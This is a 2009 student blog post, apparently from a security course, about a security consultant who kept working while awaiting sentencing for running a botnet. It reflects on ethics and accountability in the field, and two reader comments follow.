Security Professional Works as Botmaster

By erielt at 4:55 pm on January 30, 2009 | 2 Comments

Security Professional John Schiefer has continued to work in the computer security field for 15 months while he has been waiting to be sentenced for being a botmaster of a 250,000 bot herd (http://www.theregister.co.uk/2009/01/23/botmaster_sentencing_kerfuffle/). This Los Angeles based security consultant has been awaiting sentencing since pleading guilty in November of 2007. Since then, Schiefer has stated that he has been working as a professional in the security field as well as a network engineer for an internet startup. The prosecutors have requested the minimum 60-month sentence, followed by five years of supervised release. Luckily, everyone in this class has signed an ethics form so nothing like this will happen.

The primary concern with this incident is the lack of regulation for people with specialized and potentially dangerous knowledge and skills. Although there is a definite need for people to have these skills, there needs to be laws in place so that those abusing their powers will face strong retribution. We have a similar situation with locksmiths, where individuals have knowledge and ability that could be taken advantage of to harm society. Unfortunately, the wild west of the Internet isn’t yet as established as to have all the legal issues and restrictions ironed out.

What is especially disconcerting is that the ethics of Schiefer were flexible enough to go against professionalism and take advantage of others. This tarnishes the reputation of all security professionals. Although there are bad individuals in all professions, the idea that little separates the good and bad of security, the white hats and the black hats, is a concern that the security community must confront. The fact that Schiefer was hired on to continue work as a security consultant for a company after being convicted also hints at the malleability of the ethical ideals that could be conflated with computer security as a whole.

Another issue that this situation brings up is how to hold those who abuse computer security skills accountable. This is particularly relevant for our class. Although ethics forms were signed, what keeps students responsible with the knowledge they learn. Attacks and techniques learned in class are widely applicable to the web as a whole and could be easily abused for malicious purposes. To cite a recent example, cross site scripting attacks can be carried out across the web—sometimes with little effort to devastating effect. Even companies such as Google are not immune to this attack as can be seen with the recent exploit (and subsequent fix) of the Google Sites login page. Overall, I believe the concern isn’t whether these skills should be taught (the knowledge can be easily gained from other sources), but how to hold accountable those who use their ability to exploit society. As this incident with Schiefer shows, ethics can be extremely volatile. Perhaps they shouldn’t be relied on to keep those in the security field from dabbling in illegal black hat actions.

Filed under: Current Events,Ethics2 Comments »

2 Comments

  • 1
    Get your own gravatar for comments by visiting gravatar.com

    Comment by petermil

    January 30, 2009 @ 6:35 pm

    Ultimately the pool of people with security knowledge is limited, and as shown by the first lab, the way to gain experience in these sorts of matters is to actually do them (preferably in a simulated setting like that, obviously..). The people who carry out security attacks, run botnets, etc. are the people who have the skills and ‘insider’ information necessary to defend against others who might do that in the future.

    Unfortunately, I don’t think there’s any real legislation that can be done about this without having some major invasions into privacy. Locksmiths have specialized tools which they need to obtain, training classes they need, etc. A computer hacker can sit in his room at home and learn over the internet from others in an apprenticeship style manner. The government can’t really get involved in this sort of thing, short of having the trainer report it (unlikely) or listening to all traffic (both undesirable and infeasible).
    I don’t think news like this is really that bad, ultimately. Bad news is good news, so to speak–when security professionals behave appropriately, find bugs and report them promptly and work to get them fixed, it’s not much by way of news. It’s just rare-ish stories like this which give an impression that the situation is much worse, because they’re the ones that people want to read about.

  • 2
    Get your own gravatar for comments by visiting gravatar.com

    Comment by Evil Rocks

    January 31, 2009 @ 11:55 am

    Interesting parallel: the emergence of DIY biohacking and the regulation of people in the field. I read a profile of the sir who’s established one of the first RL peer-teaching groups of biohackers and his position on dangerous information and skills is something along these lines: government is always ineffective and putting power in the hands of the government inevitably leads to people rebelling against the government with the regulated tools (ex: the IRA, IEDs in Iraq/’stan, DIY missile construction in Gaza, &c.). His regulatory framework is the peer-regulation framework – that it’s more effective to build a community and ask the community to define its ethics and police its own members.

    This approach is very successful in the medical field and the law field, and taps into an emerging trend towards community and self-regulation.

RSS feed for comments on this post